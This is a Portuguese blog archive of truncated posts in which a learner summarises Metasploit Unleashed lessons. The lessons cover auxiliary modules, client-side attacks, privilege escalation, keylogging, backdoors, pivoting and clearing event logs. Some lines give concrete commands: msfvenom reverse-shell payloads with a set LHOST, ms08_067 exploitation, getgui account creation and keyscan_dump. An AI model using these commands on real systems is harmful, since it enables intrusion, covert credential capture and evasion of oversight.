Mensagens

A mostrar mensagens com a etiqueta Metasploit

DIA#32&33-Ethical Hacking Tools (Metasploit- Módulos auxiliares)

    Nestes dias continuei no tutorial da Offensive Security, na parte sobre os módulos auxiliares presentes na MSF. Admin Módulos Admin HTTP      Com o módulo " tomcat_administration " faz-se um scan de uma range de IPs e localiza o pained de administração e versão do  Tomcat Server .       Para ver um exemplo de uso ir a " https://www.offensive-security.com/metasploit-unleashed/admin-http-auxiliary-modules/ ". Módulos Admin MSSQL Com o módulo " mssql_enum " faz-se uma query num MSSQL para obter vários settings de configuração.   O módulo " mssql_exec " aproveita-se do procedimento " xp_cmdshell " para executar comandos no sistema remoto.       Para ver exemplos de uso destes módulos ir a " https://www.offensive-security.com/metasploit-unleashed/admin-mssql-auxiliary-modules/ ". Módulos Admin MySQL Com o módulo " mysql_enum " vai-se conectar a um server de base de dados remoto MySQL, com umas determinados cr...

DIA#31-Ethical Hacking Tools (Metasploit- Funcionalidades Extra da MSF part2)

       Hoje continuo no tutorial da Offensive Security, ainda na parte sobre as funcionalidades extra da MSF. Funcionalidades Extra da MSF Vulnerabilidades de File Inclusion     Em aplicações web mal programadas frequentemente verificam-se vulnerabilidades de  RFI  (Remote File Inclusion) e LFI (Local File Inclusion). Estas vulnerabilidades normalmente ocorrem quando uma aplicação web permite o utilizador submeter input em ficheiros ou fazer upload de ficheiros para o server.     Vulnerabilidades LFI permitem o attacker ler e por vezes executar ficheiros na máquina da vitima, isto pode ser perigoso, uma vez que se o web server estiver mal configurado e a correr com privilégios de alto nível, o attacker pode ficar com acesso a informação importante e se o attacker conseguir colocar código no web server (de uma outra maneira), pode começar a executar comandos arbitrários.         Vulnerabilidades RFI...

DIA#30-Ethical Hacking Tools (Metasploit- Funcionalidades Extra da MSF part1)

    Volto ao tutorial da Offensive Security, hoje continuando o foco nas funcionalidades extra da MSF. Funcionalidades Extra da MSF Karmetasploit     O Karmetasploit é uma função contida no Metasploit que permite capturar passwords,  colectar data, fazer browser attacks contra clients e falsear access points. No tutorial aparece a maneira de configurar, a função em acção e a análise do ataque. No meu caso acabei por não conseguir configurar devido ao facto de não ter um wireless adapter. Mesmo assim penso ser útil ver como Karmetasploit funciona e para isso recomendo ir a " https://www.offensive-security.com/metasploit-unleashed/karmetasploit/ ". MSF vs OS X     Tendo em conta que todos os produtos Mac têm câmaras, foram criados módulos para tirar uma foto com essa câmara. Para isto começa-se por  por gerar um  executável com " msfvenom -a x86 --platform OSX -p osx/x86/isight/bind_tcp -b "\x00" -f elf -o /tmp/osxt2 " que se vai transferi...

DIA#29-Ethical Hacking Tools (Metasploit- Manter Acesso && Funcionalidades Extra da MSF)

     Hoje continuo com o tutorial da Offensive Security, desta vez o que fazer para manter acesso do target e funcionalidades extra da MSF. Manter Acesso     Keylogger     Após obter acesso a uma máquina, normalmente é boa ideia manter esse acesso para fazer uma análise mais aprofundada. Uma ferramenta usada para essa análise é um keylogger, que permite registar todo o input do teclado, sem escrever nada no disco e deixando vestígios  mínimos.       Um exemplo de uso do keylogger encontra-se disponível no tutorial, em que primeiro faz-se exploit do sistema como normalmente com o módulo " warftpd_165_user ", de seguida migra-se o processo " Explorer.exe " e finalmente corre-se o keylogger usando " keyscan_start " e depois " keyscan_dump " para despejar o que foi escrito. Se o attacker quiser retirar informação do logon basta migrar para o processo " winlogon.exe " em vez do anterior. Backdoors Persistentes     De ...

DIA#28-Ethical Hacking Tools (Metasploit- Utilização de Scripts)

      Continuo hoje no tutorial da Offensive Security, desta vez na parte a descrever a utilização de scripts no Metasploit. Sctripts no Metasploit     Os scripts na MSF são escritos na linguagem de programação Ruby, para um olhar sobre Ruby recomendo visitar " http://ruby-doc.com/docs/ProgrammingRuby/ ". Os scripts presentes em " https://github.com/rapid7/metasploit-framework/tree/master/scripts/meterpreter " podem ser bastante úteis tanto para ver como outras pessoas resolvem problemas como para tirar partes do código.     Existem diferentes scripts incluídos na MSF alguns dos quais serão mencionados de seguida. Checkvm      O script " checkvm " é como o nome sugere uma ferramenta que permite observar se a máquina comprometida é uma máquina virtual. O script pode ser utilizado através do uso de " run checkvm " no meterpreter.  Getcountermeasure      O script " g etcountermeasure " verifica a configura...

DIA#27-Ethical Hacking Tools (Metasploit- O que fazer depois do exploit part3)

     Hoje continuo com o tutorial ainda no que fazer depois do exploit.   Pivoting     Quando se fala de pivoting, fala-se de uma técnica utilizada para se poder movimentar dentro da network, basicamente usa-se um PC comprometido para comprometer os outros previamente inacessíveis.     Um exemplo de pivoting é usar " use exploit/windows/browser/ms10_002_aurora " com um " URIPATH ", " reverse_tcp " em termos de payload e um " LHost ". Tudo isto usa-se para enviar um link para o target de modo a ter acesso ao seu PC. De seguida utiliza-se " ipconfig " na sessão do Meterpreter para obter mais informações sobre a rede, neste caso descobrindo que existe um sistema dual-homed (dispositivo ethernet que tem mais que um network interface para ter redundância), sabendo isto pode-se usar no Meterpreter " run autoroute -s 10.1.13.0/24 ", em que 10.1.13.0/24 é a network descoberta anteriormente, seguido por " run autoroute -p ",...

DIA#26-Ethical Hacking Tools (Metasploit- O que fazer depois do exploit part2)

     Continuo no tutorial da Offensive Security, na parte de o que fazer depois do exploit. Activar o Remote Desktop     Para ter acesso ao Remote Desktop  usa-se o script " getgui " no meterpreter que tanto dá acesso a Remote Desktop, como cria uma conta de utilizador para se poder fazer login, por exemplo, " run getgui -u user -p password ". Seguidamente para entrar no utilizador windows a partir de linux usa-se " rdesktop ", o que irá fechar a sessão aberta na consola. Quando se acabar de mexer no sistema deve-se limpar o utilizador criado com " run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc ". Packet Sniffing      Para fazer packet sniffing começa-se por usar " use exploit/windows/smb/ms08_067_netapi " com payload " set PAYLOAD windows/meterpeter/reverse_tcp " e um determinado LHost e RHost. A partir da sessão de Meterpreter criada usa-se " use sniffer ", " sniffer_i...

DIA#25-Ethical Hacking Tools (Metasploit- O que fazer depois do exploit part1)

    Continuo hoje no tutorial da Offensive Security, passando desta vez, tal como o titulo menciona, para o que fazer depois do exploit.     Depois de entrar num sistema quer-se ganhar ainda mais acesso à network interna do target através de pivoting e sempre a esconder os rastos. Outras opções são usar sniffers para obter mais informação/acesso ou criar um backdoor para manter acesso ao sistema.      Ganhar Privilégios      Para ganhar privilégios existe no Metasploit um script do Meterpreter que se chama " getsystem " que se usa para tentar ganhar privilégios a nível do sistema, caso este script não funcione pode-se tentar procurar outros módulos do Metasploit disponíveis com o uso de " use exploit/windows/local/ ".      Enquanto se está na máquina do target, normalmente não se quer as actividades registadas, pelo que é muitas vezes necessário apagar os event logs do windows. Para isso ...

DIA#24-Ethical Hacking Tools (Metasploit- Client-Side Attacks)

    Continuo hoje o tutorial da Offensive Security, desta vez focando nos  Client-Side Attacks.           Os client-side precisam user-interaction como a vitima clicar em links, abrir um documento ou chegar de alguma maneira ao website malicioso. Existem várias maneiras de usar Metasploit para realizar client-side attacks, sendo algumas das maneiras demonstradas de seguida.     Uma das maneiras possíveis de fazer os client-side attacks é através do uso da ferramenta msfvenom, esta ferramenta pode ser usada para gerar payloads em diferentes sítios, com diferentes outputs. Um exemplo de uso é por exemplo com o comando " msfvenom --payload-options -p windows/shell/reverse_tcp " é possível observar as diferentes opções existentes para os payload escolhido, neste caso "reverse_tcp", tendo as opções em conta usa-se o comando " msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -...

DIA#23-Ethical Hacking Tools (Metasploit- Development de uma Web App Exploit)

    Hoje estive a ver a parte do tutorial da Offensive Security relativo ao  Development de uma Web App Exploit, que como na sua maioria contém informação já algo desactualizada tomei a decisão de não a colocar no blog, todavia se quiser ver como se faz este development recomendo ir a " https://www.offensive-security.com/metasploit-unleashed/web-application-exploit-development/ ".            Durante a análise desta parte do tutorial foram, mesmo assim, apresentados alguns conceitos que considero valerem a pena de serem mencionados, entre os quais: O comando " wget <opção> <URL> " que é um package usado para recuperar ficheiros usando HTTP, HTTPS, FTP e FTPS; O comando " gzip <opção> <diretoria do ficheiro> " usa-se para comprimir/descomprimir ficheiros; AJAX é usado para partilhar data com um server e actualizar partes de uma webpage, isto é feito sem ser necessário fazer reload da página toda; URI (Unif...

DIA#22-Ethical Hacking Tools (Metasploit- Exploit Development part2)

    Continuo hoje, mais uma vez, no tutorial da Offensive Security a apirtir de onde deixei no ultimo dia.     Formatar o Exploit Module      Relativamente ao formato de um exploit module em Metasploit, é semelhante à forma de um módulo auxiliar só que tem mais campos, entre os quais, tem-se sempre um Payload Information Block (uma exploit sem payload é um módulo auxiliar), tem-se uma lista de targets delineada e em vez de se definir run(), exploit() e check() são usados.     Apesar de raramente ser implementado, o método check()deve ser definido nos exploits modules sempre que possível, de modo a, poder verificar todas as opções exceptuando os payloads e determinar se o target é vulnerável. Depois de correr, o check() retorna um check value definido, que pode ser. CheckCode::Safe – not exploitable; CheckCode::Detected – service detected; CheckCode::Appears – vulnerable version; CheckCode::Vulnerable – confirmed; CheckCode...